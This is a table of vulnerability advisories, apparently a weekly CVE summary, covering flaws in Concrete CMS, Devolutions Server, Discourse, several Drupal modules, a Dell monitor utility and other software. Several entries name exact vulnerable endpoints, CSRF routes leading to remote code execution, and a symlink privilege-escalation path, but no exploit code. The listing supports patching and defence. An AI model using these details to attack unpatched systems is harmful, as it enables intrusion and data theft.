| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to authorization Bypass in the Calendar Event Frontend Dialog which can allow cross-calendar data disclosure. A public calendar block can be used as a pivot point to access private calendar data. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8204 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to authorization bypass in the Calendar Block since action_get_events does not check canView on the calendar which results in restricted event details being disclosed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks lalalala5678 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8205 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a missing authentication gate. The endpoint /ccm/system/dialogs/file/usage/{fID} accepts an integer file ID in the URL and returns internal site structure data (page IDs, versions, URL paths) to anyone who sends a GET request. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8236 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The `/ccm/frontend/conversations/message_detail` endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8237 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The '/ccm/frontend/conversations/message_page' endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8238 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The '/ccm/frontend/conversations/get_rating' endpoint confirms existence and returns rating score for any message by ID. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8239 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthenticated page metadata disclosure across every page with a configured summary template, revealing the existence of private, draft, and restricted pages while leaking title, path, description, and author information. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8240 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Reflected XSS in Legacy Pagination via HTML attribute injection. Concrete\Core\Legacy\Pagination builds pagination links by raw-interpolating its $URL field into href="" (<a href="{$linkURL}" …>). Any authenticated admin or report viewer with access to `/dashboard/reports/forms/legacy` who clicks the crafted URL fires the payload in their session. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8245 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to password change without reauthorization and session-hardening bypass. The user-profile edit controller passes the entire raw POST array to UserInfo::update() without field whitelisting, resulting in password change without requiring the current password, and also allowing registered users to disable the per-user IP pinning in the session validator that is meant to detect hijacking. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks 0x4c616e for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8327 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR in surveys. To be vulnerable, a site would have to be configured in such a way that both public and private surveys are present on the site. An unauthenticated attacker can vote in the restricted survey by submitting the restricted optionID through the public survey's endpoint. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Zer0daySec (https://github.com/Zee99y) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8337 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to CSRF via Backend\File::approveVersion. A victim with the edit_file_contents permission can be induced via CSRF to publish an attacker-chosen, previously uploaded version (a downgrade to an older version of a file, or activation of a co-editor's unpublished version). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8340 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a wrong authorization level in the Express association Reorder dialog. This can cause cross-entity state tampering with view-only permission on one entry. To be affected, a website has to be using Express and relying on Express entity ordering. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8347 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to missing authorization in the bulk_user_assignment.php which can lead to privilege escalation to Administrative Group. Any authenticated user with access to the bulk user assignment dashboard page can add any user email to any group and can remove legitimate admins. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Vincent55 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8350 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS version 9.0 to 9.5.0 is vulnerable to Stored XSS via page name in the Atomik theme. A rogue editor can inject arbitrary JavaScript that executes in the context of any authenticated user visiting the affected account pages. This can lead to session hijacking, credential theft, malicious actions performed on behalf of users, and potential privilege escalation. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8353 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8409 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/bulk/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8410 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8411 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/cache. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8412 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/design. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8413 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/event/duplicate. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8414 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/express/association/reorder. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8415 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file addFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8416 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/do_update/<pkgHandle>. The do_update() method in concrete/controllers/single_page/dashboard/extend/update.php checks only canInstallPackages() before executing upgradeCoreData() and upgrade() on the named package's controller. Because the endpoint is a state-changing GET route with no token enforcement, an attacker can force an authenticated administrator to trigger a package upgrade via a single cross-site navigation. In order to be vulnerable, the victim must be passing canInstallPackages() and a target package must already be installed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8417 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below contains a CSRF vulnerability in the install_package() method of concrete/controllers/single_page/dashboard/extend/install.php. An attacker who can cause an authenticated administrator to visit a crafted page, and who has placed or caused a package to be present under DIR_PACKAGES/<handle>/, can force the installation of that package without any CSRF protection. Package installation executes the package controller's install() method as the web server user, enabling remote code execution. In order to be vulnerable, the victim must be passing canInstallPackages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8421 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID>. An attacker who controls the remote package returned for a known marketplace item ID can overwrite the package PHP on disk and force its upgrade() method to execute in a single browser navigation. This results in remote code execution as the web server user. In order to be vulnerable, the victim must be passing canInstallPackages, the victim site must be connected to the Concrete marketplace, and the attacker must control the package returned for a marketplace item ID already installed on the victim site. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8426 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file removeFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8427 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below emits a CSRF token in the local_available_update.php view ($token->output('do_update')) but the corresponding do_update() method in concrete/controllers/single_page/dashboard/system/update/update.php never calls $this->token->validate('do_update'). The form is rendered as a POST form, meaning the token reaches the browser, but because the controller discards it without verification, an attacker can craft a cross-site POST that triggers a core CMS update to an attacker-specified version string. In order to be vulnerable, the victim must be passing canUpgrade() and a valid update version must be present under DIR_CORE_UPDATES. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8428 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file star(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8432 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescan(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8433 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescanMultiple(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8434 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file approveVersion(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8435 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Creartia Internet Consulting--ICMS Content Management | Authorization Bypass vulnerability in Creartia's ICMS software could allow an attacker to gain unauthorized access to protected features by manipulating the HTTP redirect headers of the login process, causing the script to continue running and enabling privilege escalation without the need for credentials. | 2026-05-18 | not yet calculated | CVE-2026-4320 | https://www.incibe.es/en/incibe-cert/notices/aviso/authorization-bypass-icms-content-management-creartia-internet-consulting |
| cyntler--react-doc-viewer v1.17.1 | Cross-Site Scripting (XSS) vulnerability in @cyntler/react-doc-viewer v1.17.1 allows remote attackers to execute arbitrary JavaScript via a crafted .txt file. The TXTRenderer component fails to sanitize file content and explicitly casts raw data as a ReactNode. | 2026-05-20 | not yet calculated | CVE-2026-30691 | https://github.com/cyntler/react-doc-viewer/issues/317 https://github.com/walidriouah/CVE-2026-30691 |
| Dell--Portrait Dell Color Management Application | An issue was discovered in the Portrait Dell Color Management application before 3.7.0 for Dell monitors. On Windows, a symbolic link vulnerability allows a local low-privileged user to escalate privileges to Administrator. During installation, the software writes the file CCFLFamily_07Feb11.edr to C:\ProgramData\Portrait Displays\CW\data\i1D3\ while running with elevated privileges. Because the installer does not properly validate symbolic links or reparse points at the destination path, an attacker can create a malicious link that redirects the write operation to an arbitrary system location, enabling arbitrary file creation or overwrite with elevated privileges. | 2026-05-19 | not yet calculated | CVE-2026-34883 | https://www.portrait.com/dell-security-cve-updates/ https://www.portrait.com/dell |
| Devolutions--Server | Improper access control in the entry activity log feature in Devolutions Server allows an authenticated user with access to an entry but without the required permission to retrieve that entry's activity logs via a crafted API request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-5171 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper authorization in the Active Directory browsing feature in Devolutions Server allows a low-privileged authenticated user to obtain authentication material associated with a stored PAM provider service account via authentication relay to an attacker-controlled server. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-7325 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper enforcement of the sealed-entry workflow in the entry sensitive-data retrieval feature in Devolutions Server allows an authenticated user with access to a sealed entry to retrieve its sensitive data without triggering the unseal audit notification via a crafted API request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-8477 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper handling of factor key state in the multi-factor authentication management feature in Devolutions Server allows an attacker with knowledge of a user's password to bypass the user's multi-factor authentication after the user reconfigures their factors. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0. | 2026-05-22 | not yet calculated | CVE-2026-9047 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Missing authorization in the vault import feature in Devolutions Server 2026.1.16.0 and earlier allows a low-privileged authenticated user to create new vaults via a crafted import request. | 2026-05-22 | not yet calculated | CVE-2026-9223 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Missing authorization in the user profile update feature in Devolutions Server allows an authenticated Active Directory user to modify their own profile attributes via a crafted API request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9224 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper input validation in the external authentication provider flow in Devolutions Server allows an unauthenticated remote attacker to redirect victims to an attacker-controlled domain via a crafted login link. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9245 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper access control in the entry documentation and attachment features in Devolutions Server allows an authenticated user with vault read access to retrieve the documentation and attachments of sealed entries via a crafted API request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9246 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Insufficient logging in the entry export feature in Devolutions Server allows an authenticated user with export permissions to export a sealed entry without triggering the unseal notification to administrators via a crafted export request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9247 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Authorization bypass in the entry duplication feature in Devolutions Server allows an authenticated user with write access to any vault to copy documentation and attachments from an entry in a vault they cannot access via a crafted save request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9248 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Unverified password change in Devolutions Server allows an attacker to change a user's password without providing the previous one via a crafted password change request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9249 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Missing authorization in the entry status management feature in Devolutions Server allows a non-administrator authenticated user to bypass the administrator-enforced Pending Approval flow and gain access to an entry's data via a crafted status change request. This issue affects: Devolutions Server 2026.1.6.0 through 2026.1.16.0; Devolutions Server 2025.3.20.0 and earlier. | 2026-05-22 | not yet calculated | CVE-2026-9251 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| discourse--discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, an authenticated user on a Discourse instance with the form templates feature enabled can read the name and structured content of form templates that are intended exclusively for categories they are not authorized to access. Impact is limited to disclosure of site configuration metadata. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. | 2026-05-19 | not yet calculated | CVE-2026-33514 | https://github.com/discourse/discourse/security/advisories/GHSA-w6g7-p2p9-2m5h https://github.com/discourse/discourse/commit/ae5c9570fb918442c4d96abc83c1e7e169909b02 |
| discourse--discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, a vulnerability in the discourse-subscriptions plugin allows users to gain access to subscription-gated groups without completing payment. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. | 2026-05-19 | not yet calculated | CVE-2026-34154 | https://github.com/discourse/discourse/security/advisories/GHSA-pjgj-7mjq-6j7g |
| Drupal--Colorbox Inline | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Colorbox Inline allows Cross-Site Scripting (XSS). This issue affects Colorbox Inline: from 0.0.0 before 2.1.1. | 2026-05-19 | not yet calculated | CVE-2026-8493 | https://www.drupal.org/sa-contrib-2026-036 |
| Drupal--Date iCal | Missing Authorization vulnerability in Drupal Date iCal allows Forceful Browsing. This issue affects Date iCal: from 0.0.0 before 4.0.15. | 2026-05-19 | not yet calculated | CVE-2026-8495 | https://www.drupal.org/sa-contrib-2026-037 |
| Drupal--Drupal core | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6365 | https://www.drupal.org/sa-core-2026-001 |
| Drupal--Drupal core | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection. This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6366 | https://www.drupal.org/sa-core-2026-002 |
| Drupal--Drupal core | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6367 | https://www.drupal.org/sa-core-2026-003 |
| Drupal--Node View Permissions | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Node View Permissions allows Forceful Browsing. This issue affects Node View Permissions: from 0.0.0 before 1.7.0, from 2.0.0 before 2.0.1. | 2026-05-19 | not yet calculated | CVE-2026-8491 | https://www.drupal.org/sa-contrib-2026-034 |
| Drupal--Obfuscate | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Obfuscate allows Cross-Site Scripting (XSS). This issue affects Obfuscate: from 0.0.0 before 2.0.2. | 2026-05-19 | not yet calculated | CVE-2026-6871 | https://www.drupal.org/sa-contrib-2026-033 |
| Drupal--Orejime | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Orejime allows Cross-Site Scripting (XSS). This issue affects Orejime: from 0.0.0 before 2.0.16. | 2026-05-19 | not yet calculated | CVE-2026-6095 | https://www.drupal.org/sa-contrib-2026-032 |
| Drupal--Simple Hierarchical Select (shs) | Simple Hierarchical Select (SHS) for Drupal 7 contains a cross-site scripting risk due to improper output escaping of term-derived text. Confirmed affected paths include field formatter output (shs_field_formatter_view) and term-tree child-term data generation (shs_term_get_children). Malicious taxonomy term names can be rendered unsafely depending on output context. This affects versions from 7.x-1.0 through (and including) 7.x-1.10. | 2026-05-21 | not yet calculated | CVE-2026-4929 | NES patch branch comparison https://d7es.tag1.com/security-advisories/simple-hierarchical-select-moderately-critical-cross-site-scripting |
| Drupal--Term Reference Tree | In the Drupal 7 Term Reference Tree module, two stored XSS vectors exist in the widget/formatter rendering pipeline. Vector A (token display templates): When the Token module is enabled and token display templates are configured, attacker-controlled token output (e.g., term description) is rendered without proper sanitization. Any user who can edit the referenced taxonomy terms can inject HTML/JS that executes when the field is rendered. Vector B (term label rendering): Taxonomy term labels are not properly sanitized before being rendered in the widget, allowing a user with permission to create or edit taxonomy terms to inject scripts into the term name that execute when a form containing the widget is viewed. Exploit affects versions 7.x-1.x up to and including 7.x-1.11. | 2026-05-21 | not yet calculated | CVE-2026-4093 | https://www.herodevs.com/vulnerability-directory/cve-2026-4093 https://d7es.tag1.com/security-advisories/taxonomy-term-reference-tree-widget-moderately-critical-cross-site-scripting |
